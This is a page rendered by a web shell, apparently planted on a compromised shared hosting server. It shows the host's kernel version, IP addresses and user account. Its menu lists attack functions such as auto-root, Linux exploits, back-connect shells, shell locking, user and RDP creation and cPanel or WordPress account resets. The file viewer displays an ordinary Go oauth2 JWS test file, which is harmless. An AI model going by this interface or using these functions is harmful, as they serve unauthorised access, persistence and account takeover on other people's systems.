Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
go /
pkg /
mod /
golang.org /
x /
oauth2@v0.16.0 /
jws /
[ HOME SHELL ]
Name
Size
Permission
Action
jws.go
5.79
KB
-r--r--r--
jws_test.go
860
B
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jws_test.go
// Copyright 2016 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package jws import ( "crypto/rand" "crypto/rsa" "testing" ) func TestSignAndVerify(t *testing.T) { header := &Header{ Algorithm: "RS256", Typ: "JWT", } payload := &ClaimSet{ Iss: "http://google.com/", Aud: "", Exp: 3610, Iat: 10, } privateKey, err := rsa.GenerateKey(rand.Reader, 2048) if err != nil { t.Fatal(err) } token, err := Encode(header, payload, privateKey) if err != nil { t.Fatal(err) } err = Verify(token, &privateKey.PublicKey) if err != nil { t.Fatal(err) } } func TestVerifyFailsOnMalformedClaim(t *testing.T) { err := Verify("abc.def", nil) if err == nil { t.Error("got no errors; want improperly formed JWT not to be verified") } }
Close